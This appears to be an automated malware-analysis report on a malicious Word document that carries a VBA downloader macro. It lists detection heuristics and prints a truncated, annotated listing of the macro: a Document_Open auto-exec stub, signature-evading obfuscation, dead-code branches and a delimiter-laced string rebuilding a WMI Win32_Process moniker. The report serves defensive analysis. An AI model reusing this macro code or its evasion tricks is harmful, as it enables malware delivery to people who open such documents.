Malware Insights
The sample is a malicious Word document containing VBA macros. The `Document_open` handler in ThisDocument (its signature is split across two lines with a line-continuation underscore, which keeps the literal text "Sub Document_open" off any single line and defeats naive pattern matching) does nothing except call a function in a second module, `C7wkdr5lsrq4`; that module's `VB_Base` GUIDs and the `.HelpContextId` read identify it as a UserForm. The function reads the form's `HelpContextId`, adds 100, derives a single character from it with `ChrW(... + 15)`, and concatenates that character, the UserForm property `I0cow5hthsij4`, and a series of short fragments separated by a repeated junk delimiter ("111ss[sns ]]d][ jsa nbsb22v2yf") before handing the result to a decode routine (`Eu3m8wwsydv9fe`, presumably the Split/Join step named by the stager heuristic). With the delimiter stripped, the visible fragments read `w i nm gm t … : w in 3 2 _ … ro ce s s`, consistent with a `winmgmts:win32_…rocess` moniker — i.e. a WMI `Win32_Process` object, the classic macro technique for spawning a child process through WMI so that the new process is parented by WmiPrvSE.exe rather than WINWORD.EXE in process-tree telemetry. The two missing characters come from values not present in the extracted source, so treat that reconstruction as likely rather than confirmed; the `CreateObject` call, the command line and any download URL fall outside the first ~100 lines shown. The ClamAV detection name `Doc.Downloader.Generic-9395228-0` and the hidden-property stager heuristic both point to downloader/loader functionality, but no payload URL or second-stage location is visible here. The code is heavily obfuscated: random identifiers, string assignments that are never used (`"995"`, `"595"`, `"891"`, …), and `If Len(...) = Len(...) + 1 Then End` / `MsgBox` branches whose literal string lengths appear to make every condition false, so they are dead code intended to defeat signatures and emulation, not to alter execution flow.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-9395228-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Generic-9395228-0. A "Generic" signature identifies a downloader shape, not a specific family or campaign.
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code.
-
VBA UserForm hidden-property command stager — critical — OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER: VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId (in this sample, `HelpContextId` and the property `I0cow5hthsij4` of module `C7wkdr5lsrq4`). This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive: execution still depends on macros being enabled by the user or by policy, so the initial access relies on social engineering rather than a software vulnerability.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call (the call itself lies outside the truncated portion of the listing shown below).
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard DrawingML XML namespace identifier found in ordinary Office documents; it is not a download or C2 address and must not be used as an indicator of compromise. No payload URL appears in the visible macro source — if one exists it is assembled at runtime from the decoded strings or lies in the truncated part of the listing.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15320 bytes |

SHA-256: 3a5ca1cb029182a187d55bdd9e3a0275dac6e6c87fd330520b412e7854030542
Preview script — first 1,000 lines of the extracted script (the listing is truncated; the decode routine, the object creation and the command it executes fall outside the shown portion).
Attribute VB_Name = "Agfgzat7amxttb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: Word runs Document_Open when the document is
' opened (macro security permitting). The signature is deliberately split
' across two lines with a line-continuation underscore, so the literal text
' "Sub Document_open" never appears on a single line — this is valid VBA but
' defeats naive line-based pattern matching.
Private Sub _
Document_open()
' Hands control straight to a function in module C7wkdr5lsrq4 (apparently a
' UserForm, given its VB_Base GUIDs and the HelpContextId read further down).
' ThisDocument itself holds no other logic.
C7wkdr5lsrq4.Ou1lz1qo61ui8z40y9
End Sub
Attribute VB_Name = "C7wkdr5lsrq4"
Attribute VB_Base = "0{7E03D258-43AA-4CD8-97CC-2D0C403371CB}{4226C4BA-E15B-445C-BD37-DDE06622C570}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Ou1lz1qo61ui8z40y9()
Fr8v2zls8b2y = "995"
If Len("NywjikcwapucOp6uqmq4qp636j411i") = Len("X2irmo2chuhbns5f8x") + 1 Then End
If Len("Ppimdj2soaj7lPggl9sgzjiiiMkae8dnxtyoei") < Len("Xnb9y763my50eg8") Then
MsgBox "Ad78jin8n39u" + "N3h18jmhlvm"
MsgBox ("T0nl00g1nykjlm")
MsgBox "Afv70lz57xih9u01" + "Nptj_wp52516r9o"
End If
If Len("Omc1zohbery12jfY2285paugchr_0") = Len("S6xni8_6ehrft9") Then
MsgBox "Cszl71gr2fltuwh1" + "Ec_7d89s_8w"
MsgBox ("Ikswr_14zczsn8h9 !!!")
MsgBox "Lj9rq0q05_v24" + "Vu3o748cxr9ndorsg1"
End If
Irt4xutdkcwg = C7wkdr5lsrq4.HelpContextId + 50 + 50
Wzgbiy4paglhik = "595"
If Len("Uycab2nh0_dxZs0pfs7_ify7zf2") = Len("Cqexke7r8xx") + 1 Then End
If Len("Mhcfbhqsi8b1ohvKemwxf6t0am5xstWntads6rzi5hopi") < Len("Omc3ka7lnth") Then
MsgBox "Ww72nt6bzuq" + "H68omxeu3kjkq3i7ri"
MsgBox ("Ol5xcnd67uho_8f")
MsgBox "Kds_2oyjvmvlwl" + "Oq96wqi5aj4j_u7knk"
End If
If Len("U3_j7gxub233iPy9cbubgjr20ez1") = Len("Biamshuhcz07hdjr") Then
MsgBox "So80hl2ixsst8c0" + "Iyu37cnd1_nvf0gij"
MsgBox ("Kk5268kd71czgx !!!")
MsgBox "A7q1zyya4ji9fcymkj" + "Qzbw4xs3gyba52"
End If
R1mnoqp3mqpcw58r1 = ChrW(Irt4xutdkcwg + (15))
D5cqn6l9jih3u = "891"
If Len("Q3a39e80frpDscsykqk42tml8ur3") = Len("Y75ymti4ixohywat15") + 1 Then End
If Len("Tu9ljl7izrbupgjtuMfuk7c58vd9Ug2wbmauunqku") < Len("Ec0bpdqtiymry") Then
MsgBox "Mn14lnz645e9saqe1j" + "O720uy56j9dkvyec"
MsgBox ("Qx0gxmke9rvq")
MsgBox "D0c2ea2pges" + "L81utko0jrclu9t"
End If
If Len("Vxhjpg5fi5udl3Nryhpuvohhs5x7") = Len("Fgsjvt9idjdul12k") Then
MsgBox "Mau671d9jj_b8ngj" + "Qnwbg9viu0m_jy"
MsgBox ("Y7mxl7lrommk0h !!!")
MsgBox "X8l5cnyvlc_x" + "T29avsebau9wm"
End If
Ucxo09ox51xnyxh = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + R1mnoqp3mqpcw58r1 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + C7wkdr5lsrq4.I0cow5hthsij4 + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
Okt9g0iidmg7 = "530"
If Len("Uovf0ybcnh22bho7T8pl9v9shx1qh") = Len("Kd3dnp6xykdhd3ge26") + 1 Then End
If Len("Tvkql65xx3amxHmykebqteieiMflc87drlexqiu4h") < Len("Q0rb4qt6w48hqbmdf") Then
MsgBox "Ml1eqtz_ha58r" + "Ikvg2z114hkchj7c"
MsgBox ("Idil7ett9m5is")
MsgBox "Smi7grgnqw2" + "N5nmqdf1s5jnqfb"
End If
If Len("Vm7slgv20n1wf_xwJw1fw81c3t8c7qa") = Len("Nud1ihnjxodotv") Then
MsgBox "Ex4cumshqgptxz" + "B8zgxqt8lfjrth5m"
MsgBox ("Fb1qdord_myu4z1 !!!")
MsgBox "Ylg1m0bx2r8l7_a" + "V7lw0i0thdxe7mtr"
End If
Add_aj_cn46 = Eu3m8wwsydv9fe(Ucxo09ox51xnyxh)
Cpl6t_e99clkzbp = "949"
If Len("PhatiltzgawroD74nmnyvvbd2euwj") = Len("Awwbw7dm48xztnxt") + 1 Then End
If Len("Ypslzcwaw_psZd9mv74ytazaMa8c
... (truncated)
|
|||